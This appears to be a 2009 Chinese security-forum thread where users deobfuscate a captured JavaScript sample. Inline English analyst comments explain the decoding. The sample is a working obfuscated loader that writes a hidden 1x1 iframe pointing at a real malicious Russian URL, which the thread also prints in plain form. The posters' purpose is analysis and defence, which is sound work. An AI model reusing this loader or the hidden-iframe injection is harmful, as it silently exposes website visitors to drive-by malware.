
首页 » 技术交流区 » 恶意网站交流 » 解一下这段
kekao - 2009-11-4 19:45:00
地址忘记了,只保留这段代码.看看能解出什么.:kaka2:
<SCRIPT>function EHiIJePEcw(ulpCsvj){ window.eval(); fff=op.split("808");var cfR = document.getElementById('mmqTtKlM'); fff=op.split("808"); }
/* Analyst notes (comments only; the sample text itself is unchanged).
   Only MWmC, AEvZVPZNFD and dHIw are called (by the document[...] statement further down).
   EHiIJePEcw, YZa, pEoRMK, pmRHfFR, KclHkhdGZ and RIgCFtAxxz are never called in this
   snippet, and `op` / `fff.op` are not defined anywhere in it, so they look like filler
   placed around the decoders (inference from the visible code only). */
/* MWmC: ignores its argument. The table is split on '-', each 'a,b' pair becomes the
   character with code (a*6 + b)/7, and the trailing empty element is skipped by length-1.
   The hex sums used for the loop start and step evaluate to 0 and 1.
   Decoded output: "<iframe width=1 height=1 border=0 frameborder=0 sr" */
function MWmC(BearIYRq){var mKV=7,YkbYJCT=6;var oxoIbl='70,0-122,3-119,0-133,0-113,1-127,1-117,5-37,2-138,5-122,3-116,4-135,2-121,2-71,1-57,1-37,2-121,2-117,5-122,3-120,1-121,2-135,2-71,1-57,1-37,2-114,2-129,3-133,0-116,4-117,5-133,0-71,1-56,0-37,2-119,0-133,0-113,1-127,1-117,5-114,2-129,3-133,0-116,4-117,5-133,0-71,1-56,0-37,2-134,1-133,0-',zaT=oxoIbl.split('-');axqOJ='';for(kwyB=-0x27+0xb+0x7-0x20-0x2b-0x15-0x24+0x99;kwyB<zaT.length-1;kwyB+=-0x11+0x5+0x1f-0x1a+0x15-0xd){ lkIybN=zaT[kwyB].split(',');QgApMlQ = parseInt(lkIybN[0]*YkbYJCT)+parseInt(lkIybN[1]);QgApMlQ = parseInt(QgApMlQ)/mKV;axqOJ += String.fromCharCode(QgApMlQ);}return axqOJ;}function YZa(oeX){ var pJl = document.getElementById('qOelcWasl'); fff.op.replace("349"); }
/* AEvZVPZNFD: same scheme with character code (a*6 + b)/3; loop start 0, step 1.
   Decoded output (URL defanged in this note):
   "c='hxxp://beautymoda[.]ru/templates/index.php'></ifr" */
function AEvZVPZNFD(LIFcfdLH){var HJyQJCh=3,jeZdGOQ=6;var KjHEXEIdkJ='49,3-30,3-19,3-52,0-58,0-58,0-56,0-29,0-23,3-23,3-49,0-50,3-48,3-58,3-58,0-60,3-54,3-55,3-50,0-48,3-23,0-57,0-58,3-23,3-58,0-50,3-54,3-56,0-54,0-48,3-58,0-50,3-57,3-23,3-52,3-55,0-50,0-50,3-60,0-23,0-56,0-52,0-56,0-19,3-31,0-30,0-23,3-52,3-51,0-57,0-',lriKMwwx=KjHEXEIdkJ.split('-');JfjXEx='';for(ZgTXVDgz=-0x16-0x27+0xb+0x32;ZgTXVDgz<lriKMwwx.length-1;ZgTXVDgz+=-0x29-0xd-0x2+0x39){ FFnqTqfmLG=lriKMwwx[ZgTXVDgz].split(',');MrhQEK = parseInt(FFnqTqfmLG[0]*jeZdGOQ)+parseInt(FFnqTqfmLG[1]);MrhQEK = parseInt(MrhQEK)/HJyQJCh;JfjXEx += String.fromCharCode(MrhQEK);}return JfjXEx;}function pEoRMK(XZSID){ window.eval(); }
/* dHIw: same scheme with character code (a*2 + b)/3; loop start 0, step 1.
   Decoded output: "ame>" */
function dHIw(tjOXAMWOgY){var hKIOWv=3,RWSAZ=2;var cEIlpbf='145,1-163,1-151,1-93,0-',cZEvzvzVm=cEIlpbf.split('-');LhYWR='';for(wyKQ=0x27+0x17+0x29-0x27+0x1a+0x28-0x82;wyKQ<cZEvzvzVm.length-1;wyKQ+=0x7+0x28-0x16+0x2a-0x42){ PxBIqahRH=cZEvzvzVm[wyKQ].split(',');flmVPcepJ = parseInt(PxBIqahRH[0]*RWSAZ)+parseInt(PxBIqahRH[1]);flmVPcepJ = parseInt(flmVPcepJ)/hKIOWv;LhYWR += String.fromCharCode(flmVPcepJ);}return LhYWR;}function pmRHfFR(pgnrM){ alert('HSvAcVduec');alert('HSvAcVduec');window.eval(); }
/* Sink: stripping the digits from 'w1048r1089i2324t9206e47288999' leaves "write", so the
   statement below is document.write(a, b, c). document.write concatenates its arguments,
   so the three decoder outputs together form one 1x1 borderless iframe element pointing at
   the URL above. No single decoder output holds the complete src attribute or the complete
   closing tag, and the method name "write" never appears literally in the sample. */
document['w1048r1089i2324t9206e47288999'.replace(/[0-9]/g,'')](MWmC('PofcUQAK'),AEvZVPZNFD('IvcfFGzPPr'),dHIw('Mjqk'));function KclHkhdGZ(QKOQPtxhyR){ var sAGUIHGGR = document.getElementById('yZQx'); fff.op.replace("218"); }
function RIgCFtAxxz(tArQ){  fff.op.replace("174");alert('THFHkBk');var YuqvP=new Function("bRTF", "return 57690;"); }
</SCRIPT>

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
aaccbbdd - 2009-11-4 20:49:00
神器里保持原状运行看看结果
shadowmin - 2009-11-4 20:55:00
http://beautymoda.ru/templates/index.php
kekao - 2009-11-4 21:07:00
详细说一下过程.
aaccbbdd - 2009-11-4 21:12:00
将eval全换为alert
在神器里运行看看
shadowmin - 2009-11-4 21:24:00
document['w1048r1089i2324t9206e47288999'.replace(/[0-9]/g,'')](MWmC('PofcUQAK'),AEvZVPZNFD('IvcfFGzPPr'),dHIw('Mjqk'));
这个是document.write,里面有三个函数,好像执行的时候一次只能执行一个,所以,每次删除一个,就得到了。
例如先执行一次,然后删除“MWmC('PofcUQAK'),”再执行一次,结果就出来了。
在神器,在redoce中都可以。
天涯浪子1988 - 2009-11-5 16:54:00
无法学习  无法膜拜 唯有望尘莫及
kekao - 2009-11-5 17:32:00
修改为document['w1048r1089i2324t9206e47288999'.replace(/[0-9]/g,'')](MWmC('PofcUQAK')+AEvZVPZNFD('IvcfFGzPPr')+dHIw('Mjqk'));
保存html运行.开始没看清楚.:kaka6:
天涯浪子1988 - 2009-11-5 17:39:00
你在改什么:kaka2: :kaka2:  shadowmin 没说那么改
kekao - 2009-11-5 17:45:00
难道改错了.手动解一下.没用工具.:kaka12:
天涯浪子1988 - 2009-11-5 17:46:00
document['w1048r1089i2324t9206e47288999'.replace(/[0-9]/g,'')]这个改成document.write
document.write执行了三个函数 网马地址藏在第二个函数里



    <SCRIPT>function EHiIJePEcw(ulpCsvj)
{
  // Never called anywhere in this listing. window.eval() with no argument does
  // nothing useful, and `op` is not defined in the visible code, so op.split()
  // would throw if this body ever ran. It looks like filler placed around the
  // real decoders (inference from the visible snippet only).
  window.eval();
  fff=op.split("808");
  var cfR = document.getElementById('mmqTtKlM');
  fff=op.split("808");
 
}
/**
 * First of three string decoders; the argument BearIYRq is never read.
 *
 * The table is a '-'-separated list of 'a,b' pairs. Each pair becomes the
 * character with code (a*6 + b)/7; every pair in this table divides evenly.
 * Decoded output: "<iframe width=1 height=1 border=0 frameborder=0 sr"
 * The attribute name is cut off at "sr"; its remainder is not in this table.
 *
 * @returns {string} the decoded fragment
 */
function MWmC(BearIYRq)
{
  var mKV=7,YkbYJCT=6;
  var oxoIbl='70,0-122,3-119,0-133,0-113,1-127,1-117,5-37,2-138,5-122,3-116,4-135,2-121,2-71,1-57,1-37,2-121,2-117,5-122,3-120,1-121,2-135,2-71,1-57,1-37,2-114,2-129,3-133,0-116,4-117,5-133,0-71,1-56,0-37,2-119,0-133,0-113,1-127,1-117,5-114,2-129,3-133,0-116,4-117,5-133,0-71,1-56,0-37,2-134,1-133,0-',zaT=oxoIbl.split('-');
  // axqOJ, kwyB, lkIybN and QgApMlQ are assigned without var, so they become globals.
  axqOJ='';
  // The hex sum evaluates to 0 (loop start) and the increment sum to 1;
  // length-1 skips the empty element left by the trailing '-'.
  for(kwyB=-0x27+0xb+0x7-0x20-0x2b-0x15-0x24+0x99;
  kwyB<zaT.length-1;
  kwyB+=-0x11+0x5+0x1f-0x1a+0x15-0xd)
  {
    lkIybN=zaT[kwyB].split(',');
    // The multiplication coerces the string 'a' to a number before parseInt sees it.
    QgApMlQ = parseInt(lkIybN[0]*YkbYJCT)+parseInt(lkIybN[1]);
    QgApMlQ = parseInt(QgApMlQ)/mKV;
    axqOJ += String.fromCharCode(QgApMlQ);
  }
  return axqOJ;
}
// Never called in this listing. `fff` is only ever assigned inside EHiIJePEcw,
// which is itself never called, so fff.op would throw here; appears to be filler
// (inference from the visible snippet only).
function YZa(oeX)
{
  var pJl = document.getElementById('qOelcWasl');
  fff.op.replace("349");
 
}
/**
 * Second string decoder; the argument LIFcfdLH is never read.
 *
 * Same table format as MWmC, with character code (a*6 + b)/3.
 * Decoded output (URL defanged in this note):
 * "c='hxxp://beautymoda[.]ru/templates/index.php'></ifr"
 * This is the fragment that carries the remote address, matching the URL
 * posted in the thread and the "second function" remark.
 *
 * @returns {string} the decoded fragment
 */
function AEvZVPZNFD(LIFcfdLH)
{
  var HJyQJCh=3,jeZdGOQ=6;
  var KjHEXEIdkJ='49,3-30,3-19,3-52,0-58,0-58,0-56,0-29,0-23,3-23,3-49,0-50,3-48,3-58,3-58,0-60,3-54,3-55,3-50,0-48,3-23,0-57,0-58,3-23,3-58,0-50,3-54,3-56,0-54,0-48,3-58,0-50,3-57,3-23,3-52,3-55,0-50,0-50,3-60,0-23,0-56,0-52,0-56,0-19,3-31,0-30,0-23,3-52,3-51,0-57,0-',lriKMwwx=KjHEXEIdkJ.split('-');
  // JfjXEx, ZgTXVDgz, FFnqTqfmLG and MrhQEK are assigned without var (globals).
  JfjXEx='';
  // Start expression sums to 0, increment sums to 1; the trailing empty element is skipped.
  for(ZgTXVDgz=-0x16-0x27+0xb+0x32;
  ZgTXVDgz<lriKMwwx.length-1;
  ZgTXVDgz+=-0x29-0xd-0x2+0x39)
  {
    FFnqTqfmLG=lriKMwwx[ZgTXVDgz].split(',');
    MrhQEK = parseInt(FFnqTqfmLG[0]*jeZdGOQ)+parseInt(FFnqTqfmLG[1]);
    MrhQEK = parseInt(MrhQEK)/HJyQJCh;
    JfjXEx += String.fromCharCode(MrhQEK);
  }
  return JfjXEx;
}
// Never called in this listing; the body is a single window.eval() with no
// argument, which evaluates nothing. Appears to be filler.
function pEoRMK(XZSID)
{
  window.eval();
 
}
/**
 * Third string decoder; the argument tjOXAMWOgY is never read.
 *
 * Same table format as the other two, with character code (a*2 + b)/3.
 * Decoded output: "ame>", the tail of a closing tag whose head is produced
 * by a different decoder.
 *
 * @returns {string} the decoded fragment
 */
function dHIw(tjOXAMWOgY)
{
  var hKIOWv=3,RWSAZ=2;
  var cEIlpbf='145,1-163,1-151,1-93,0-',cZEvzvzVm=cEIlpbf.split('-');
  // LhYWR, wyKQ, PxBIqahRH and flmVPcepJ are assigned without var (globals).
  LhYWR='';
  // Start expression sums to 0, increment sums to 1; the trailing empty element is skipped.
  for(wyKQ=0x27+0x17+0x29-0x27+0x1a+0x28-0x82;
  wyKQ<cZEvzvzVm.length-1;
  wyKQ+=0x7+0x28-0x16+0x2a-0x42)
  {
    PxBIqahRH=cZEvzvzVm[wyKQ].split(',');
    flmVPcepJ = parseInt(PxBIqahRH[0]*RWSAZ)+parseInt(PxBIqahRH[1]);
    flmVPcepJ = parseInt(flmVPcepJ)/hKIOWv;
    LhYWR += String.fromCharCode(flmVPcepJ);
  }
  return LhYWR;
}
// Never called in this listing: two identical alert() calls with a random-looking
// string, then window.eval() with no argument. Appears to be filler.
function pmRHfFR(pgnrM)
{
  alert('HSvAcVduec');
  alert('HSvAcVduec');
  window.eval();
 
}
// Poster's modified sink: the digit-padded property lookup from the original
// sample has been replaced by plain document.write, and only the second decoder
// is kept. The call still writes the decoder's output into the live document as
// markup; swapping it for alert, as the thread suggests, shows the same string as
// text without rendering it.
document.write(AEvZVPZNFD('IvcfFGzPPr'));
  </SCRIPT>
document清除就得到了  当然document.write改alert放浏览器里执行也可以
shadowmin - 2009-11-5 21:52:00
8L的方法更科学。
我的方法有些土。
天涯浪子1988 - 2009-11-5 22:25:00
呵呵 主要是个修改代码的问题  好让浏览器能读出我们希望达到的效果 
不过我主要想说的是:document.write 不改就放到浏览器里执行,不就等于直接执行恶意代码了么?:kaka12: